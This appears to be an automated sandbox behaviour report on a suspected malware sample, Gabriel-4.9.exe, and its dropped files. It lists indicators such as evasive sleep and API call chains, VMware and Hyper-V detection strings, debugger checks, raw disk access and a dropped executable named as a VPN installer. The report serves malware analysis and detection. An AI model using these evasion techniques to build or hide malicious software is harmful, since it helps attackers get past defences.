Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1140
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1095
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 744
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 809
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 774
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 955
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 696
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 911
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 456
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 545
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 783

Source: C:\ProgramData\Program\iusb3mon.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_30-35457

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Dropped PE file which has not been started: C:\Program Files\product1\letsvpn-latest.exe

Jump to dropped file

Source: C:\ProgramData\Program\iusb3mon.exe

Evasive API call chain: RegOpenKey,DecisionNodes,Sleep

graph_30-35405

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_0-3248

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

API coverage: 5.3 %

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe TID: 5896	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6368	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4904	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 508	Thread sleep count: 4577 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep count: 1851 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6968	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6672	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6324	Thread sleep count: 4004 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6324	Thread sleep count: 2061 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3004	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6276	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1924	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe TID: 4996	Thread sleep count: 37 > 30
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe TID: 4996	Thread sleep time: -37000s >= -30000s
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe TID: 6324	Thread sleep count: 1970 > 30
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe TID: 2548	Thread sleep count: 2407 > 30
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe TID: 2548	Thread sleep time: -7221000s >= -30000s
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe TID: 2548	Thread sleep count: 2019 > 30
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe TID: 2548	Thread sleep time: -6057000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2064	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2644	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5564	Thread sleep count: 930 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6940	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3796	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2784	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3132	Thread sleep time: -922337203685477s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 7744	Thread sleep time: -79000s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 5884	Thread sleep time: -127080s >= -30000s
Source: C:\ProgramData\Program\iusb3mon.exe TID: 7736	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 2196	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7456	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368	Thread sleep count: 4901 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368	Thread sleep count: 73 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7592	Thread sleep count: 6100 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7608	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8024	Thread sleep count: 2668 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8104	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8088	Thread sleep count: 2920 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8112	Thread sleep count: 139 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8172	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8124	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8012	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7272	Thread sleep count: 4479 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268	Thread sleep count: 591 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4560	Thread sleep count: 4769 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7632	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248	Thread sleep count: 135 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2988	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6508	Thread sleep count: 4557 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920	Thread sleep count: 5584 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912	Thread sleep count: 200 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5752	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7376	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4372	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6800	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6228	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2784	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8116	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 764	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3088	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4824	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6344	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3780	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6504	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2796	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe

Thread sleep count: Count: 1970 delay: -10

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_06292E2C __EH_prolog,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

30_2_06292E2C

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_062972F5 GetSystemInfo,wsprintfA,

30_2_062972F5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: Gabriel-4.9.exe, 00000000.00000002.2228384701.0000000000627000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: irsetup.exe, 00000002.00000002.4674992748.0000000002A6F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.4141899434.00000256EEC54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000024.00000002.4133684932.00000256E962B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW l
Source: irsetup.exe, 00000002.00000002.4674992748.0000000002A50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\Gabriel-4.9.exe	API call chain: ExitProcess graph end node	graph_0-3250
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	API call chain: ExitProcess graph end node	graph_2-24789
Source: C:\ProgramData\Program\iusb3mon.exe	API call chain: ExitProcess graph end node	graph_30-35197

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Code function: 0_2_00007FF746502680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_00007FF746502680

Source: C:\Users\user\Desktop\Gabriel-4.9.exe

Code function: 0_2_00007FF746501908 LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_00007FF746501908

Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0034DB1C mov ecx, dword ptr fs:[00000030h]	30_2_0034DB1C
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0035817A mov eax, dword ptr fs:[00000030h]	30_2_0035817A
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_062500CD mov eax, dword ptr fs:[00000030h]	30_2_062500CD

Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

Code function: 2_2_000000018003A8E4 GetProcessHeap,HeapAlloc,_errno,_errno,__doserrno,_errno,GetProcessHeap,HeapFree,SetEndOfFile,_errno,__doserrno,GetLastError,

2_2_000000018003A8E4

